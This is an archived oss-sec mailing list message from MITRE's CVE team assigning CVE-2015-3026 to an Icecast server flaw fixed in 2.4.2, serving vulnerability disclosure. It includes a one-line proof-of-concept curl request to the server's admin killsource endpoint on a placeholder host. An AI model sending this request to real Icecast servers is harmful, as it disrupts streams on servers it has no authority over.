oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CVE Request for Icecast 2.3.3, 2.4.0, 2.4.1, fixed in 2.4.2

From: cve-assign () mitre org
Date: Wed, 8 Apr 2015 16:02:40 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Proof of concept:
curl "http://example.org:8000/admin/killsource?mount=/test.ogg";



https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
https://trac.xiph.org/ticket/2191
http://lists.xiph.org/pipermail/icecast-dev/2015-April/002460.html
https://trac.xiph.org/changeset/27abfbbd688df3e3077b535997330aa06603250f/icecast-server


Use CVE-2015-3026.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJVJYi2AAoJEKllVAevmvms858IAI8wg3JmqdfCvZxkAxnR6F15
pcYt1qveLRqwK33Y3Og7ZGfGsO1xaKdY/af1RbTzklvYA1SrnZjmjqdF8R8+fZwe
lCKWOhlHSxmEuEJo4XyMt2ZWP9LZ5h2MwqVNAwFqQ4/BfTesEWB0beV37jzmWejQ
bVVg6irkB8kHvoXCcCwhtj/Gc5cSrAdQHuep8wz2PnYyv1aH9FMtrBIQlX1ujwC3
EUYgpVUpckvPK7EEmyMwQq7nKU3h+JsSHaJJAPfffre//7WF4BTcqT0R1Bfw6ekK
cLaRbSgQwq/mknq28bq0BGq3ihtMVoH/bfmqWPcVaCbtDRTjGZ7EIRQs7GKQvT0=
=5Sv4
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: